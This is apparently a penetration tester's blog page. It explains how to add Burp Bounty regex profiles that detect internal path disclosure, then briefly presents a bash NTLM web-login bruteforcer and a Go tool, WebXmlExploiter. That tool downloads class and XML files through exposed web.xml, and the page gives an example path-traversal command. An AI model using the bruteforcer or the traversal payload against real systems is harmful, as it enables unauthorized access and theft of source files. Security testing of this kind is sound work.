terça-feira, 23 de março de 2021

Burp Suite - Adding Internal Path Disclosure Capabilities

Hi guys, I hope everyone is healthy.

If you work with Burp suite, maybe you noticed Burp cannot identify Internal PATH Disclosure vulnerabilities by default.

I know most of the time, this vulnerability is ranked as Informational or Low. But I decided to write this after using the information acquired due to the internal path leakage to perform a more complex chain attack.

For this reason, the vulnerability was ranked as high due to the overall impact. In other words, I would not be able to create an effective attack chain without this leaked path.

The implementation is quite simple:

Install the extension Burp Bounty (Unfortunately, it is available for Buro Pro only).
On the tab Profiles -> Passive Response Profiles -> Add
Fulfill the fields(Response) and click on Add
Here you add the regex you are looking for. It's possible to add more than one regex. In my case, I created two different profiles, one for Windows issues and another one for Linux. 

Following the regex for both cases: 

Linux:  (?<!\S)(?:/[^/\s>]+)+
Thanks to codeworm for the help with Linux regex.

Windows: ([a-zA-Z]):\\?(\\[a-zA-Z0-9._-].*\s.*+)+\\
For Windows, the regex needs some enhancements.  

The new issues:

Now, some extra configuration is required to Burp shows it properly on the Target tab.
Click on the Issue tab and fulfill the fields. The Severy and Confidence must be selected. You are free to select the rating you want. The issue detail is the information that will be displayed on the Target tab.

After you added all the information, click OK and double-check if everything is saved. Sometimes the extension does not save the regex, them you must add it again.

Testing your new issues:

Navigate to: https://owasp.org/www-community/attacks/Full_Path_Disclosure and run a passive scan on this page.

Your Burp should show something like that:

Note: The Severity and Confidence are different on purpose, just to show it is possible to assess it differently.

Checking the match on the source code:



This it, guys! 
Since I update the windows regex, I will update the post.



Simple Bash "Multitask" Web NTLM Authentication Bruteforcer.
Usage/Help./webnbf.sh <userlist> <passwordlist> https://target


Add or remove the curl proxy parameters according to your environment.



The WebXmlExploiter is a tool to exploit exposed by misconfiguration or path traversal web.xml files.
It will try to download all .class and XML files based on the information extracted from the web.xml file.

WebXmlExploiter is an exploitation tool only, not a vulnerability scanner.
I will not add a brute-forcing feature since tools like wfuzz,ffuzz, and burp suite can do it better.
I recommend running the jadx to decompile the .class files.

Download the latest release and unpack it in the desired location.
Remember to install GoLang in case you want to run from the source.
WebXmlExploiter uses the github.com/antchfx/xmlquery libraries.

Check the following link for more information: https://github.com/antchfx/xmlquery/

Run: go get github.com/antchfx/xmlquery before running the WebXmlExploiter.

WebXmlExploiter is licensed under the SushiWare license. Check docs/license.txt for more information.

Please refer to the output of -h for usage information and general help. Also, you can contact me on ##spoonfed@freenode.org (two #)

Example: go run webxmlexploiter.go -u https://vulnapp/somedir/anotherdir/../../../WEB-INF/

Go Version

Tested on:
go version go1.14.4 windows/amd64
go version go1.15.2 linux/amd64

To Do
Parsing enhancements Add cookies support.